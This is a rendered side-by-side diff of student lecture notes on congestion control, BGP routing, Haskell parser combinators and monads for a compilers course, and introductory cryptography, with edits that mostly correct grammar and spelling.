- It relies on **using loss events** and **loss intervals** for correct computation of packet loss rate and is in accordance with how TCP performs packet loss calculation - It relies on **using loss events** and **loss intervals** for correct computation of packet loss rate and is in accordance with how TCP performs packet loss calculation
- A **loss event** is defined as a number of packets lost within a single RTT - A **loss event** is defined as a number of packets lost within a single RTT
This can be done either on the sending or receiving side This can be done either on the sending or receiving side
**Sender-side**: if the packet loss detection is done in the sender, the sender can use timeout mechanism for each packet or gap in sequence numbers of the acknowledged **Sender-side**: if packet loss detection is done by the sender, the sender can use a timeout mechanism for each packet or a gap in the sequence numbers of acknowledged packets.
- The receiver has to acknowledge either every packet or every packet not received - The receiver has to acknowledge either every packet or every packet not received
- Acknowledging every packet can introduce high levels of traffic between between sender and receiver - Acknowledging every packet can introduce high levels of traffic between the sender and receiver
- This is solved by having receivers send report summaries of losses every nth packet or nth RTT - This is solved by having receivers send report summaries of losses every nth packet or nth RTT
**Receiver-side**: Packet loss is detected in the receiver and explicitly reported back to the sender **Receiver-side**: Packet loss is detected in the receiver and explicitly reported back to the sender
@@ -116,30 +116,30 @@ This can be done either on the sending or receiving side
##### Sender vs Receiver Detection ##### Sender vs Receiver Detection
Receiver driven packet loss discovery is preferred. Receiver-driven packet loss discovery is preferred.
- This is because loss events are sent early as possible - This is because loss events are sent as early as possible
- This means high responsiveness - This means high responsiveness
In the case of very high congestion - where there is no feedback from the receiver In the case of very high congestion - where there is no feedback from the receiver
- The pure receiver based loss detection is useless because the sender has no way of calculating packet loss - Pure receiver-based loss detection is useless because the sender has no way of calculating packet loss
- In these cases sender enters **self-limitation** - where packet loss is assumed and sending rate is decreased or even stopped - In these cases, the sender enters **self-limitation** - where packet loss is assumed and the sending rate is decreased or even stopped
#### Adaption #### Adaptation
Once the parameters of a given link are measured (packet loss and round trip times), there is a range of approaches that could be followed when choosing rate adaptation scheme(s). Once the parameters of a given link are measured (packet loss and round trip times), there is a range of approaches that could be followed when choosing rate adaptation scheme(s).
**Equation-based control** uses a control equation that explicitly gives the maximum acceptable sending rate as a function of the recent loss event rate (loss rates). **Equation-based control** uses a control equation that explicitly gives the maximum acceptable sending rate as a function of the recent loss event rate (loss rates).
**Additive Increase Multiplicative Decrease (AIMD) control** of in response to a single congestion indication. **Additive Increase Multiplicative Decrease (AIMD) control** in response to a single congestion indication.
###### Decision Function ###### Decision Function
Options for Decision function: Options for Decision function:
- **On congestion** (overload/packet loss/packet loss increase), **decrease the rate immediately, or periodically**** - **On congestion** (overload/packet loss/packet loss increase), **decrease the rate immediately or periodically**
- On absence of congestion** (underload/no packet loss, packet loss decrease), **increase the rate immediately** - **In the absence of congestion** (underload/no packet loss, packet loss decrease), **increase the rate immediately**
###### Increase/decrease function ###### Increase/decrease function
@@ -153,12 +153,12 @@ The default for the Internet is **constant linear increase**.
One could argue that a loss estimate of zero indicates that there is no congestion and thus the sending rate should be increased with the maximum possible increase factor until a loss event occurs. One could argue that a loss estimate of zero indicates that there is no congestion and thus the sending rate should be increased with the maximum possible increase factor until a loss event occurs.
- However, this approach **causes instabilities** in the sending rate and is very susceptible to a noisy packet drop rates. - However, this approach **causes instabilities** in the sending rate and is very susceptible to noisy packet drop rates.
Options for **decrease phase** Options for **decrease phase**
- constant multiplicative decrease factor, TCP-like or TCP-similar like. - constant multiplicative decrease factor, TCP-like or TCP-similar like.
- linear decrease - Linear decrease
- straight jump to the expected value (calculated by the formula) - straight jump to the expected value (calculated by the formula)
The default for the internet is multiplicative decrease (halving) The default for the internet is multiplicative decrease (halving)
@@ -170,23 +170,23 @@ Options for **decision frequency**
Decision frequency specifies **how often to change the rate.** **Based on system control theory, optimal adjustment frequency depends on the feedback delay.** Decision frequency specifies **how often to change the rate.** **Based on system control theory, optimal adjustment frequency depends on the feedback delay.**
- The feedback delay **is the time between changing the rate and detecting the network’s reaction to that change.** - The feedback delay **is the time between changing the rate and detecting the network’s reaction to that change.**
- It is suggested that equation-based schemes adjust their rates **not more than once per RTT**. - It is suggested that equation-based schemes adjust their rates **not more than once per RTT**.
- Changing the rate too often results in oscillation - Changing the rate too often results in oscillation
- Infrequent change of the rate leads to an unresponsive behaviour. - Infrequent changes in the rate lead to unresponsive behaviour.
###### Self Clocking ###### Self Clocking
Aim is that transmission spacing matches bottleneck rate The aim is for transmission spacing to match the bottleneck rate.
- Avoids consistent queuing at bottleneck - Avoids consistent queuing at bottleneck
- Queue to smooth out short-term variation - Queue to smooth out short-term variation
##### Congestion Control ##### Congestion Control
Aim to obey **conversation of packets** Aim to obey **conservation of packets**
- In equilibrium flow is conservative - In equilibrium flow is conservative
- New packet doesn't enter until one leaves - A new packet doesn't enter until one leaves
This fails in three ways: This fails in three ways:
@@ -199,8 +199,8 @@ Solutions:
**Slow-start** **Slow-start**
- Each ACK opens congestion window by 1 packet - Each ACK opens congestion window by 1 packet
- Every ACK, `cwnd += 1` - Every ACK, `cwnd += 1`
- Every RTT `cwnd *= 2` - Every RTT `cwnd *= 2`
- If a stop occurs, stop or `cwnd == ssthresh` - If a stop occurs, stop or `cwnd == ssthresh`
- Else multiplicative increase - Else multiplicative increase
@@ -209,10 +209,10 @@ Solutions:
**Congestion Avoidance** **Congestion Avoidance**
1. Network signals congestion occurring 1. Network signals congestion occurring
- Detect loss - Detect loss
2. Host responds by reducing sending rate 2. Host responds by reducing sending rate
- `ssthresh := cwnd/2` multiplicative decrease - `ssthresh := cwnd/2` multiplicative decrease
- `cwnd := 1` initialises slow start - `cwnd := 1` initialises slow start
Avoid congestion by slow increase Avoid congestion by slow increase
@@ -222,7 +222,7 @@ TCP is not always useful
- Reliability can cause untimely delivery - Reliability can cause untimely delivery
Audio/Video codecs usually produce frames (not continuous bytestream) Audio/video codecs usually produce frames (not a continuous byte stream).
- Losing a frame is better than delaying all subsequent data - Losing a frame is better than delaying all subsequent data
@@ -230,6 +230,6 @@ UDP encapsulates media using **R**eal **T**ime **P**rotocol
- Sequencing, time stamping, delivery monitoring, no quality of service - Sequencing, time stamping, delivery monitoring, no quality of service
- Adds a control channel - Adds a control channel
- Back channel to report statistics & participants - Back channel to report statistics and participants
- Transport only - Transport only
- Leaves encodings & floor control to application - Leaves encodings and floor control to the application
+46 -46
View File
@@ -5,8 +5,8 @@
The main job is to distribute the data to build forwarding tables The main job is to distribute the data to build forwarding tables
- These are **intra-domain routing protocols** - These are **intra-domain routing protocols**
- Or **Interior gateway protocols** - Or **Interior gateway protocols**
- When the source and destination are **inside** the **same network** - When the source and destination are **inside** the **same network**
It is important to distinguish between local and global protocols It is important to distinguish between local and global protocols
@@ -18,17 +18,17 @@ The internet inter-domain routing protocol
- Derives from GGP & EGP - Derives from GGP & EGP
- Deals in IP prefixes and **autonomous systems** - Deals in IP prefixes and **autonomous systems**
- autonomous systems are purely administrative - autonomous systems are purely administrative
- Purpose is to enable *policy* to be applied - Purpose is to enable *policy* to be applied
- Only prefixes matter in the data-plane - Only prefixes matter in the data-plane
- Internet policy domains - Internet policy domains
- Logical construct only - Logical construct only
- No meaning outside BGP - No meaning outside BGP
- Do not map simply onto ISPs or networks - Do not map simply onto ISPs or networks
- Currently ~493,000 prefixes & ~46,000 ASs - Currently ~493,000 prefixes and ~46,000 ASs
- Because we have less ASs, the routing is easily -> less complex - Because we have fewer ASs, routing is easier and less complex
- Reduces complexity - Reduces complexity
- Speeds up performance - Speeds up performance
BGP uses TCP as transport BGP uses TCP as transport
@@ -44,25 +44,25 @@ Sessions between peers have:
A BGP peer typically has many sessions A BGP peer typically has many sessions
- Logically, for each peer, it receives the information about routing from peers, this is sorted into `Adj-RIB-in` table. - Logically, for each peer, it receives routing information from peers. This is sorted into an `Adj-RIB-in` table.
- After processing, it produces a `Adj-RIB-out` table which it sends to other peers - After processing, it produces an `Adj-RIB-out` table which it sends to other peers
- Advertisements received and to be sent - Advertisements received and to be sent
- Generates a local RIB table from `Adj-RIB-in` - Generates a local RIB table from `Adj-RIB-in`
- Routes to use and potentially distribute - Routes to use and potentially distribute
- Resolved into per-port forwarding tables - Resolved into per-port forwarding tables
- Generate `Adj-RIB-out` from `Loc-RIB` and policy - Generate `Adj-RIB-out` from `Loc-RIB` and policy
#### Update messages #### Update messages
- Incremental - indicate *changes* to state - Incremental - indicate *changes* to state
- These updates could be: - These updates could be:
- Withdrawn routes - Withdrawn routes
- Path attributes, common to all advertised routes - Path attributes, common to all advertised routes
- Advertised routes, known as NLRI - Advertised routes, known as NLRI
- There are ~27 path attributes - There are ~27 path attributes
- Only ~12 are in common use - Only ~12 are in common use
- Communicate information about prefixes - Communicate information about prefixes
- Used to apply policy in BGP *decision process* - Used to apply policy in BGP *decision process*
##### Path Attributes ##### Path Attributes
@@ -75,7 +75,7 @@ Mandatory - every AS has to inform the other ASs about these 3 attributes:
Discretionary Discretionary
- Local preferences - Local preferences
- Allows prioritisation of ASs - Allows prioritisation of ASs
Optional & transitive Optional & transitive
@@ -96,9 +96,9 @@ Optional & non-transitive
- How do we know if an AS has seen this advert before - How do we know if an AS has seen this advert before
- Store the list of ASs in the packet - Store the list of ASs in the packet
- This is called the `AS_PATH` - This is called the `AS_PATH`
- This way loops can be broken - This way loops can be broken
- If our ASN appears in a received `AS_PATH`, drop the advert - If our ASN appears in a received `AS_PATH`, drop the advert
##### Decision Process ##### Decision Process
@@ -107,7 +107,7 @@ Drop prefix if:
- `NEXT_HOP` is unreachable via local routing table - `NEXT_HOP` is unreachable via local routing table
- Local AS appears in `AS_PATH` (packet in a loop) - Local AS appears in `AS_PATH` (packet in a loop)
Then (commonly) apply following preference: Then (commonly) apply the following preferences:
1. Higher `weight` (local to this router) 1. Higher `weight` (local to this router)
2. Highest `LOCAL_PREF` 2. Highest `LOCAL_PREF`
@@ -117,7 +117,7 @@ Then (commonly) apply following preference:
6. `EGP` to `IGP` (hot potato) 6. `EGP` to `IGP` (hot potato)
7. Shortest internal path 7. Shortest internal path
8. Prefer oldest route 8. Prefer oldest route
- Oldest routes are often most stable - Oldest routes are often most stable
9. Lowest interface IP address 9. Lowest interface IP address
### Consistency ### Consistency
@@ -127,37 +127,37 @@ Learn external routes on `EBGP` sessions
- `EBGP` defined as peers having different ASNs - `EBGP` defined as peers having different ASNs
- Must ensure every router knows all external routes - Must ensure every router knows all external routes
- Redistribute external routes inside the network - Redistribute external routes inside the network
- Via `IGP` - only in small networks - Via `IGP` - only in small networks
- via `IBGP` - gives full control over route distribution - via `IBGP` - gives full control over route distribution
###### Scaling ###### Scaling
Can distribute `IBGP` routes on `IBGP` sessions Can distribute `IBGP` routes on `IBGP` sessions
- Have to maintain $N\cdot \frac{(N-1)}{2}$ `IBGP` sessions - Have to maintain $N\cdot \frac{(N-1)}{2}$ `IBGP` sessions
- Each carrying up to 490k routes x2 tables - Each carrying up to 490k routes x2 tables
- Two standard solutions - Two standard solutions
1. **Route Reflectors** 1. **Route Reflectors**
- Super nodes re-advertising `IBGP` routes - Super nodes re-advertising `IBGP` routes
- Allows for hierarchy - Allows for a hierarchy
2. **AS Confederations** 2. **AS Confederations**
- split AS up into mini-ASs - split AS up into mini-ASs
###### Failures ###### Failures
- Handling link failures - Handling link failures
- Bind to loopback - Bind to loopback
- If it cant talk to other nodes, will only support communication internally - If it can't talk to other nodes, it will only support communication internally
- Flap damping - Flap damping
- A warning message saying don't send traffic to me - A warning message saying don't send traffic to me
- This can make things worse if this message is delayed - This can make things worse if this message is delayed
- Process failures - Process failures
- Out of memory error due to too many routes - Out-of-memory error due to too many routes
##### Network Inter-connection ##### Network Inter-connection
- Networks interconnect via `EBGP` sessions - Networks interconnect via `EBGP` sessions
- POPs - points of presence or IX internet exchanges - POPs - points of presence or IX internet exchanges
- Multi-homing - Multi-homing
- This is all logical - This is all logical
- http://0x0.st/ooCs.png - http://0x0.st/ooCs.png
+7 -7
View File
@@ -1,6 +1,6 @@
# Compilers - COMP 3012 # Compilers - COMP 3012
A compiler is a tool that maps one language into another language. It takes a program written in a source programming language and maps it to program written in a target programming language. A compiler is written in an **implementation language**. A compiler is a tool that maps one language into another language. It takes a program written in a source programming language and maps it to a program written in a target programming language. A compiler is written in an **implementation language**.
![img](img/a.png) ![img](img/a.png)
@@ -10,21 +10,21 @@ An **interpreter** is a program that takes a source program and executes the pro
![img](img/b.png) ![img](img/b.png)
> NOTE: Java uses both. A java source program is compiled into byte code (by a compiler) which is then executed by an interpreter (called java virtual machine - JVM). JVM will also compile fragments of code so that if there is a call back, it can execute the compiled code. This is called compilation on the fly. > NOTE: Java uses both. A Java source program is compiled into bytecode (by a compiler), which is then executed by an interpreter (called the Java virtual machine - JVM). The JVM will also compile fragments of code so that if there is a call back, it can execute the compiled code. This is called compilation on the fly.
Compilers will often use an **intermediate representation (IR)** to bridge the gap between the source language and the executable language. Converting source language to IR is called **front end**, where as converting IR to executable code is called **back end**. Compilers will often use an **intermediate representation (IR)** to bridge the gap between the source language and the executable language. Converting source language to IR is called **front end**, whereas converting IR to executable code is called **back end**.
* The front end focuses on understand the source-language program. - The front end focuses on understanding the source-language program.
* The back end focuses on mapping programs to the target machine - The back end focuses on mapping programs to the target machine
![img](img/c.png) ![img](img/c.png)
* The front end, intermediate representation and the back end are all part of the compiler. - The front end, intermediate representation and the back end are all part of the compiler.
IR is stored as an Abstract Syntax Tree **AST**. IR is stored as an Abstract Syntax Tree **AST**.
The syntactic details needed for parsing the source program are represented in the structure of the tree. The syntactic details needed for parsing the source program are represented in the structure of the tree.
The **IR** could be broken down into many sub-steps i.e. a IR1 could be created which is then ran through an optimiser to create IR2 which is fed into the back end instead of IR1. This is called a *three-phase compiler*. The **IR** could be broken down into many sub-steps, i.e. an IR1 could be created, which is then run through an optimiser to create IR2, which is fed into the back end instead of IR1. This is called a *three-phase compiler*.
![img](img/d.png) ![img](img/d.png)
+7 -9
View File
@@ -28,7 +28,7 @@ exp -> exp + exp
-> 7 + (10 / 3) * (-2) -> 7 + (10 / 3) * (-2)
``` ```
This grammar is **ambiguous**, this means one input expression could be generated in several different ways. This grammar is **ambiguous**: this means one input expression could be generated in several different ways.
$$ $$
5 - 4 \times 7 5 - 4 \times 7
@@ -43,7 +43,7 @@ exp -> exp - exp
-> 5 - 4 * 7 -> 5 - 4 * 7
``` ```
However there is another way to derive this expression starting with `*` However, there is another way to derive this expression starting with `*`
```haskell ```haskell
exp -> exp * exp exp -> exp * exp
@@ -52,7 +52,7 @@ exp -> exp * exp
-> 5 - 4 * 7 -> 5 - 4 * 7
``` ```
These give us two different ASTs, which gives us two different numeric answers. We must use more terminal symbols to follow BIDMAS. These give us two different ASTs, which give us two different numeric answers. We must use more terminal symbols to follow BIDMAS.
![](img/e.png) ![](img/e.png)
@@ -74,7 +74,7 @@ This grammar is unique (non-ambiguous)
## Semantics of Expressions ## Semantics of Expressions
On the left hand side the $+$ is just a symbol, however on the right hand side it is an arithmetic sum operation. On the left-hand side, the $+$ is just a symbol; however, on the right-hand side it is an arithmetic sum operation.
$[\![ exp + exp ]\!] = [\![exp ]\!] + [\![exp ]\!]$ | $[\![ exp - exp ]\!] = [\![exp ]\!] - [\![exp ]\!]$ ... same for all binary operations $[\![ exp + exp ]\!] = [\![exp ]\!] + [\![exp ]\!]$ | $[\![ exp - exp ]\!] = [\![exp ]\!] - [\![exp ]\!]$ ... same for all binary operations
@@ -99,14 +99,12 @@ $[\![d_0 ]\!] = value(d_0)$
$[\![d_s d_0]\!] = [\![d_s ]\!]\times10 + value(d_0)$ $[\![d_s d_0]\!] = [\![d_s ]\!]\times10 + value(d_0)$
## Scanners and Parsers ## Scanners and Parsers
![img](img/f.png) ![img](img/f.png)
Scanners take the source language as input and outputs a stream of tokens. Scanners take the source language as input and output a stream of tokens.
A **token** is a chunk of input; "words" of the language eg. integers, operator symbols, identifiers (function & variable names etc), parenthesis. A **token** is a chunk of input; "words" of the language, e.g. integers, operator symbols, identifiers (function & variable names etc.), parentheses.
The **grammar of tokens is always regular**, this means it can be generated and recognised by a DFA (deterministic finite automata). The **grammar of tokens is always regular**: this means it can be generated and recognised by a DFA (deterministic finite automaton).
@@ -2,8 +2,6 @@
In our parser - there's a lot of repeated code and a lot of cases. In our parser - there's a lot of repeated code and a lot of cases.
Types of scanner and parser are very similar Types of scanner and parser are very similar
```haskell ```haskell
@@ -38,4 +36,3 @@ parseParenthesis = do symbol '('
symbol ')' symbol ')'
return t return t
``` ```
+5 -8
View File
@@ -1,6 +1,6 @@
# Functor # Functor
Parsing an expression in parenthesis: Parsing an expression in parentheses:
```haskell ```haskell
parseP :: Parser AST parseP :: Parser AST
@@ -22,9 +22,9 @@ Before we write this sort of code, we need to understand `type classes` (especia
| String | Functor | | String | Functor |
| | Monad | | | Monad |
**Eq**: typeclass equality; A type can only be typeclass equality if two like types can be compared **Eq**: type class for equality; a type can only be in this type class if two values of that type can be compared
A type can be a *member* (instance) of a type class, meaning that if has the properties/functions that the class requires A type can be a *member* (instance) of a type class, meaning that it has the properties/functions that the class requires
e.g. `Bool` is an instance of `Eq` and `Show` e.g. `Bool` is an instance of `Eq` and `Show`
@@ -61,7 +61,7 @@ newtype Parser a = P (String -> [a, String])
**Parser AST** is a type **Parser AST** is a type
Functor is a typeclass of which `parser` is an instance Functor is a type class of which `parser` is an instance
##### Functor ##### Functor
@@ -95,7 +95,4 @@ fmap id = id -- identity
fmap (f . g) = fmap f . fmap g fmap (f . g) = fmap f . fmap g
``` ```
Haskell doesn't enforce these rules however it is convention. Haskell doesn't enforce these rules; however, following them is convention.
@@ -28,7 +28,7 @@ fmap2 :: (a -> b -> c) -> f a -> f b -> f c
fmap3 :: (a -> ... n) -> f a -> ... f n fmap3 :: (a -> ... n) -> f a -> ... f n
``` ```
`Functor f` can do `fmap1` however cannot do `fmap0` or `fmap2` etc. `Functor f` can do `fmap1`; however, it cannot do `fmap0` or `fmap2` etc.
**Remember**: `a -> b -> c == a -> (b -> c)` **Remember**: `a -> b -> c == a -> (b -> c)`
@@ -92,4 +92,3 @@ All parse does is apply a parser
Where `P` is the constructor Where `P` is the constructor
`parse ( P p ) = p` `parse ( P p ) = p`
+4 -13
View File
@@ -22,8 +22,6 @@ intORbin :: Parser Int
expr :: Parser AST expr :: Parser AST
``` ```
``` ```
λ> parse (symbol "something") "nothing" λ> parse (symbol "something") "nothing"
[] []
@@ -59,8 +57,6 @@ instance Functor Parser where
in [(g x, src1)] ) in [(g x, src1)] )
``` ```
``` ```
λ> parse (fmap (+3) integer) "42 blah blah" λ> parse (fmap (+3) integer) "42 blah blah"
[(45, blah blah)] [(45, blah blah)]
@@ -75,7 +71,7 @@ instance Functor Parser where
*** Exception Non-exhaustive patterns *** Exception Non-exhaustive patterns
``` ```
fixing `fmap` Fixing `fmap`
```haskell ```haskell
fmap g pa = P (\src -> [ (g x, src1) | (x,src1) <- parse pa src]) fmap g pa = P (\src -> [ (g x, src1) | (x,src1) <- parse pa src])
@@ -152,11 +148,9 @@ pf <*> pa = P (\src -> [ (f x, src2) | (f,src1) <- parse pf src,
[(10201, ""), (25, "")] [(10201, ""), (25, "")]
``` ```
### Monad Class of Parser ### Monad Class of Parser
Monad class will facilitate the use of `do` notation. The Monad class will facilitate the use of `do` notation.
```haskell ```haskell
instance Monad Parser where instance Monad Parser where
@@ -228,7 +222,7 @@ pa >>= fpb = P (\src -> [ r | (x,src1) <- parse pa src,
-- second part will look at 113, realise it is not a binary digit and just read 11 which is equal to 3 hence true -- second part will look at 113, realise it is not a binary digit and just read 11 which is equal to 3 hence true
``` ```
What is the do notation and how is it connected to the bind function, we will show this by writing a simple parser What is the `do` notation and how is it connected to the bind function? We will show this by writing a simple parser
```haskell ```haskell
pairSum :: Parser Int pairSum :: Parser Int
@@ -262,8 +256,6 @@ parse (symbol "number" >> integer) "number 9"
NOTE: >> is a non-dependant bind NOTE: >> is a non-dependant bind
``` ```
```haskell ```haskell
the grammer the grammer
--funApp ::= ( simpleFun integer ) --funApp ::= ( simpleFun integer )
@@ -402,7 +394,7 @@ string (c:cs) = do char c
[(' ',"hello")] [(' ',"hello")]
``` ```
We have to fix leading white space causing failure We have to fix leading whitespace causing failure
```haskell ```haskell
space :: Parser () space :: Parser ()
@@ -463,4 +455,3 @@ expr = do t1 <- mexpr
<|> <|>
return t1) return t1)
``` ```
+8 -8
View File
@@ -1,6 +1,6 @@
# Compiling Variables # Compiling Variables
A variable is identified by a alphanumeric string. We can store this as a list of pairs, with the variables identifier and its value. A variable is identified by an alphanumeric string. We can store this as a list of pairs, with the variable's identifier and its value.
Variable Environment or VarEnv - `[(Identifier, Stack Address)]` Variable Environment or VarEnv - `[(Identifier, Stack Address)]`
@@ -8,7 +8,7 @@ A stack address is an integer value that specifies where in the stack that varia
The bottom of the stack is indexed `0`. The bottom of the stack is indexed `0`.
Lets say our environment consists of 3 variables named x,y,z. It would look like: Let's say our environment consists of 3 variables named x, y, z. It would look like:
`[("z",2), ("y",1), ("x",0)]` `[("z",2), ("y",1), ("x",0)]`
@@ -18,13 +18,13 @@ Lets say our environment consists of 3 variables named x,y,z. It would look like
| y | 2 | 1 | | y | 2 | 1 |
| z | 9 | 2 | | z | 9 | 2 |
To get the value of a variable from the stackk, TAM uses the instruction `LOADL a` where `a` is a stack address. `LOADL` will get the value and copy the value to the top of the stack. To get the value of a variable from the stack, TAM uses the instruction `LOADL a` where `a` is a stack address. `LOADL` will get the value and copy the value to the top of the stack.
`LOAD a` - copy address a to top of stack `LOAD a` - copy address a to top of stack
`STORE a` - pop top of stack to address a `STORE a` - pop top of stack to address a
For example if `LOADL 2` is called, it will effect the stack in the following way: For example, if `LOADL 2` is called, it will affect the stack in the following way:
| Variables | Stack (Values) | Index | | Variables | Stack (Values) | Index |
| :-------: | :------------: | :---: | | :-------: | :------------: | :---: |
@@ -38,7 +38,7 @@ For example if `LOADL 2` is called, it will effect the stack in the following wa
expCode :: VarEnv -> Expr -> [TAMInst] expCode :: VarEnv -> Expr -> [TAMInst]
``` ```
Before we just called the abstract syntax tree `AST` however with the extended grammar now we will have multiple ASTs, one for programs, one for commands, expressions. The AST for expressions we call `Expr`. Before, we just called the abstract syntax tree `AST`; however, with the extended grammar, we will now have multiple ASTs: one for programs, one for commands and one for expressions. The AST for expressions we call `Expr`.
Remember in our compiler, the stack is represented and stored as a list, with the top of the stack being the head of the list. Remember in our compiler, the stack is represented and stored as a list, with the top of the stack being the head of the list.
@@ -87,10 +87,10 @@ $$
Example: $s_n$ could be your bank balance and $a_n$ could be the purchase history. Example: $s_n$ could be your bank balance and $a_n$ could be the purchase history.
- In our case: - In our case:
- States are VarEnv & next free address space for next variable - States are VarEnv & next free address space for next variable
- Outputs are TAM instructions - Outputs are TAM instructions
We to define a type that models a state transform, while at the same time producing a result. This is where a state monad comes in. We need to define a type that models a state transform, while at the same time producing a result. This is where a state monad comes in.
```haskell ```haskell
newtype ST st a = S (\st -> (a, st)) newtype ST st a = S (\st -> (a, st))
@@ -26,7 +26,7 @@ var z;
var w := x * y - 2 var w := x * y - 2
``` ```
The parser will turn this into a list of AST for declarations The parser will turn this into a list of ASTs for declarations
Then we have to use this to build a variable environment, and generate TAM code to write the values of the variables onto the stack. Then we have to use this to build a variable environment, and generate TAM code to write the values of the variables onto the stack.
@@ -91,7 +91,7 @@ command ::= identifier := expr
| begin commands end | begin commands end
``` ```
Here: `:=`, `if`, `then`, `else`, `while`, `do`, `getint`, `printint`, `begin`, `end`, `(`, `)` are terminal Here: `:=`, `if`, `then`, `else`, `while`, `do`, `getint`, `printint`, `begin`, `end`, `(`, `)` are terminals
```haskell ```haskell
data Command = data Command =
@@ -134,7 +134,7 @@ func :: a -> b
Note file name must start with a capital Note file name must start with a capital
When you import a module, can can use functions defined in the module When you import a module, you can use functions defined in the module
```haskell ```haskell
data FileType = EXP | TAM data FileType = EXP | TAM
@@ -143,7 +143,7 @@ data Option = Trace | Run | Evaluate
main :: IO () --input output monad main :: IO () --input output monad
``` ```
this is the entry point, to compile This is the entry point; to compile:
```shell ```shell
$ ghc Main.hs -o aec $ ghc Main.hs -o aec
@@ -161,4 +161,3 @@ stGet = S (\s -> (s,s))
stRevise :: (st -> st) -> ST st () stRevise :: (st -> st) -> ST st ()
stRevise f = stGet >>= stUpdate . f stRevise f = stGet >>= stUpdate . f
``` ```
+2 -2
View File
@@ -2,7 +2,7 @@
**Mini Triangle Programs** -$parse$-> **AST** -$Code\space Generation$-> **TAM Programs** -$execute$ -> **Output** **Mini Triangle Programs** -$parse$-> **AST** -$Code\space Generation$-> **TAM Programs** -$execute$ -> **Output**
Before we could generate a list of instructions to be executed in sequence, now we need to implement code thats conditionally executed or executed multiple times. Before, we could generate a list of instructions to be executed in sequence; now we need to implement code that's conditionally executed or executed multiple times.
```haskell ```haskell
--Code for dealing with functions and commands --Code for dealing with functions and commands
@@ -71,7 +71,7 @@ JUMPIFZ "label3"
Labels must **always** be **unique**. Labels must **always** be **unique**.
This would require a global variable in our compiler to count the number of labels, haskell doesnt not allow global variables. This would require a global variable in our compiler to count the number of labels; Haskell does not allow global variables.
We can use the `stateMonad` instead. We can use the `stateMonad` instead.
@@ -4,7 +4,7 @@ You can think of a monad as a container for a data type
If $M$ is a monad, that means an element of $M$: $M_a$ is some sort of container where $a$ is any datatype If $M$ is a monad, that means an element of $M$: $M_a$ is some sort of container where $a$ is any datatype
One of the purposes of the `do` notation is to operate on the whole data structure by specify operations that must apply to each of the elements in the data structure, without having to specify the whole structure. One of the purposes of the `do` notation is to operate on the whole data structure by specifying operations that must apply to each of the elements in the data structure, without having to specify the whole structure.
$$ $$
M_a=\{x_1, x_2, x_3,...\} M_a=\{x_1, x_2, x_3,...\}
@@ -41,7 +41,7 @@ pure x
Monads can have containers within containers Monads can have containers within containers
Assume we have function `makeBlob` that maps every element of $a$ to an element of $M_b$ Assume we have a function `makeBlob` that maps every element of $a$ to an element of $M_b$
```haskell ```haskell
makeBlob :: a -> Mb makeBlob :: a -> Mb
+26 -27
View File
@@ -10,7 +10,7 @@
**Asymmetric** **Asymmetric**
>“Methods which use separate, but related, private and public keys.” > “Methods which use separate, but related, private and public keys.”
**Protocols** **Protocols**
@@ -20,7 +20,7 @@
> “The science and art of breaking cryptosystems.” > “The science and art of breaking cryptosystems.”
### Modern Cyptography (1970-) ### Modern Cryptography (1970-)
**Fundamentally different** - a scientific and mathematical discipline **Fundamentally different** - a scientific and mathematical discipline
@@ -46,13 +46,12 @@
- Modular arithmetic is a system of arithmetic for finite sets of integers - Modular arithmetic is a system of arithmetic for finite sets of integers
- Common sets include - Common sets include
- $\mathbb{N} = \{1,2,3,...\}$ - $\mathbb{N} = \{1,2,3,...\}$
- $\mathbb{Z} = \{..., -3, -2, -1, 0,1,2,3,...\}$ - $\mathbb{Z} = \{..., -3, -2, -1, 0,1,2,3,...\}$
- Also $\mathbb{Q}, \mathbb{R}, \mathbb{C}$ - Also $\mathbb{Q}, \mathbb{R}, \mathbb{C}$
- Cryptography is almost always interested in finite sets - Cryptography is almost always interested in finite sets
- This is useful as it avoids overflow errors - This is useful as it avoids overflow errors
- When we add or multiply two 1 byte binary digits, the result will always be 1 byte - When we add or multiply two 1 byte binary digits, the result will always be 1 byte
###### Congruence ###### Congruence
@@ -73,7 +72,7 @@ This can be rewritten as: $a = q\cdot m+r$
###### Equivalence Classes ###### Equivalence Classes
- The sets of all integers **mod 5** form a series of equivalence classes - The sets of all integers **mod 5** form a series of equivalence classes
- All these numbers act the same in any modluo sum - All these numbers act the same in any modulo sum
For example For example
@@ -99,25 +98,25 @@ The integer ring $\mathbb{Z}_m$ consists of:
1. The set $\mathbb{Z}_m = \{0, 1,\ldots m-1\}$ 1. The set $\mathbb{Z}_m = \{0, 1,\ldots m-1\}$
2. Two operations $+$ and $\cdot$ for all $a, b \in \mathbb{Z}_m$ such that: 2. Two operations $+$ and $\cdot$ for all $a, b \in \mathbb{Z}_m$ such that:
1. $a+b \equiv c \space (mod\space m), (c\in \mathbb{Z})$ 1. $a+b \equiv c \space (mod\space m), (c\in \mathbb{Z})$
2. $a\cdot b \equiv d \space (mod\space m), (d\in \mathbb{Z})$ 2. $a\cdot b \equiv d \space (mod\space m), (d\in \mathbb{Z})$
Any time you add or multiply any two numbers in the set, the result is always in the set. We use $\equiv$ instead of $=$ as it could be an intermediatary number e.g. 12 instead of 2. Any time you add or multiply any two numbers in the set, the result is always in the set. We use $\equiv$ instead of $=$ as it could be an intermediate number, e.g. 12 instead of 2.
##### Properties of Rings ##### Properties of Rings
- We can add or multiply any two numbers in the ring, and the result is in the ring - We can add or multiply any two numbers in the ring, and the result is in the ring
- It is closed - It is closed
- Addition and multiplication are associative - Addition and multiplication are associative
- (a+b)+c = a + (b+c) - (a+b)+c = a + (b+c)
- There is a neutral element 0 for addition - There is a neutral element 0 for addition
- $a + 0 \equiv a\space mod \space m$ - $a + 0 \equiv a\space mod \space m$
- The additive inverse always exists - The additive inverse always exists
- $a + (-a) = 0\space mod \space m$ - $a + (-a) = 0\space mod \space m$
- There is a neutral element for multiplication - There is a neutral element for multiplication
- $a\cdot 1 \equiv a\space mod\space m$ - $a\cdot 1 \equiv a\space mod\space m$
- The multiplicative inverse exists for some but not all elements - The multiplicative inverse exists for some but not all elements
- $a\cdot a^{-1} \equiv 1 \space mod \space m$ - $a\cdot a^{-1} \equiv 1 \space mod \space m$
#### Modular Inversion #### Modular Inversion
@@ -158,7 +157,7 @@ $$
##### Frequency Analysis ##### Frequency Analysis
- The frequency of occurrences of each character are very consistent - The frequency of occurrences of each character is very consistent
- The longer a cipher text is, the easier this becomes - The longer a cipher text is, the easier this becomes
#### Affine Cipher #### Affine Cipher
@@ -174,23 +173,23 @@ $$
where $k=(a,b)$ and $gcd(a,26)=1$ where $k=(a,b)$ and $gcd(a,26)=1$
